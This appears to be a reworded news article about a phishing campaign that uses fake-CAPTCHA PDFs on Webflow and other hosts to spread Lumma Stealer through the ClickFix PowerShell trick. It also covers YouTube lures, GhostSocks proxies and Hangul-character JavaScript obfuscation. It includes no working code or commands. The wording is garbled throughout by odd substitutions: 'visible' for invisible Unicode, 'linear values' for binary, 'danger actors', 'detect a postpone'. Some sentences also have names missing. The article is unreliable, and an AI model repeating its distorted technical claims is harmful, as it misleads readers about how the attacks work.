Researchers studying security have discovered a common phishing plan that uses fake CAPTCHA images sent via File documents hosted on Webflow’s content distribution network ( CDN) to distribute Lumma grabber malware.
According to Netskope Threat Labs, 260 distinct regions host 5, 000 spoofing PDF files that redirect users to shady sites.
In a statement shared with The Hacker News, security researcher Jan Michael Alcantara claimed that the intruder “uses SEO to key subjects into visiting the pages by clicking on malignant search engine results.”
While the majority of phishing websites concentrate on stealing credit card data, some PDF files contain false CAPTCHAs that deceive victims into performing destructive PowerShell commands, ultimately resulting in the Lumma Stealer malware.
Since the second half of 2024, the phishing campaign has reportedly affected more than 1, 150 businesses and more than 7, 000 people across the fabrication, engineering, and financial services sectors, with the attacks mostly targeting victims in North America, Asia, and Southern Europe.
The majority of the 260 regions that have been uncovered are , followed by those that are related to GoDaddy, Strikingly, Wix, and Fastly.
Intruders have also been found uploading some of the PDF files to trustworthy online libraries and archives like PDFCOFFEE, PDF4PRO, PDFBean, and Internet Archive, so that people who search for PDF files on search engines are directed to them.
The Files contain phony CAPTCHA graphics that serve as a means of obtaining credit card information. Alternately, Lumma Stealer distributions that include images that the sufferer can get to a malicious website when they click the document.
For its part, the website uses the ClickFix method to trick the sufferer into running an MSHTA command that uses a PowerShell script to execute the stealer malware. It masquerades as a false CAPTCHA verification page on the website.
Lumma Stealer has recently been duped into Roblox activities, as has a cracked version of the Windows Total Commander, highlighting the variety of delivery methods used by several danger actors. People are redirected to these websites by YouTube videos that were most likely uploaded from accounts that have recently been compromised.
According to Silent Push,” Harmful links and infected files are frequently disguised in]YouTube movies, comments, or explanations.” When engaging in YouTube content, especially when asked to get or click on links, using caution and being wary of unverified sources can help you safeguard against these growing threats.
Additionally, the cybersecurity firm discovered that Lumma Stealer logs are being offered for free on a relatively new hacking forum called Leaky [. ] a pro that became operating in late December 2024.
Lumma Stealer is a that is available for purchase under the malware-as-a-service ( MaaS ) model, allowing users to get access to a variety of information from compromised Windows hosts. The malware developers made an announcement to integrate with GhostSocks, a Golang-based proxy malware, in the first 2024.
For danger actors, adding a SOCKS5 backconnect feature to already-existing Lumma infections or any other malware for that matter is extremely profitable, according to Infrawatch.
By utilizing victims ‘ internet connections, intruders can circumvent geographic limitations and IP-based integrity checks, especially those put in place by financial institutions and other high-value targets. This capability significantly increases the likelihood of success for unauthorized access attempts made with credentials obtained from infostealer files, thereby enhancing Lumma infection ‘ post-exploitation potential.
According to and , stealer malware like and Atomic macOS Stealer ( ) are being distributed using the ClickFix method through lures for the DeepSeek artificial intelligence ( AI ) chatbot.
Phishing attacks have also been reported that use a JavaScript subterfuge method that uses visible Unicode characters to reflect linear values, a method that was first discovered in October of this year.
The method involves using Unicode filler characters, particularly Hangul half-width ( U+FFA0 ) and Hangul full-width ( U+3164 ), to represent the binary values 0 and 1, respectively, and converting each ASCII character in the JavaScript payload to their Hangul equivalents.
The attacks were highly personalized, with non-public information included, and the first Browser attempted to debug a debugger target if it were being analyzed, detect a postpone, and therefore abort the attack by redirecting to a benign website, according to Juniper Threat Labs.